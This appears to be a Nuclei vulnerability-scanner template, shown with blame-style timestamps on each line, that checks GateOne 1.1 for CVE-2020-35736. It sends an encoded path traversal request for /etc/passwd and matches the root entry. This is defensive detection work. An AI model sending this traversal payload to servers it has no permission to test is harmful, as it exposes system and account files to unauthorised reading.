2021-05-27 12:56:22 +00:00
id : CVE-2020-35736
info :
2022-06-28 19:07:58 +00:00
name : GateOne 1.1 - Local File Inclusion
2021-05-27 12:56:22 +00:00
author : pikpikcu
severity : high
2022-06-28 19:07:58 +00:00
description : GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.
2021-08-18 11:37:49 +00:00
reference :
2021-05-27 13:03:59 +00:00
- https://github.com/liftoff/GateOne/issues/747
2021-05-28 03:56:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
2022-05-17 09:18:12 +00:00
- https://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-35736
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,gateone,lfi
2021-05-27 12:56:22 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
matchers-condition : and
matchers :
2021-05-27 15:02:32 +00:00
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-05-27 12:56:22 +00:00
- type : status
status :
2022-05-13 20:26:43 +00:00
- 200
2022-06-28 19:07:58 +00:00
# Enhanced by mp on 2022/06/28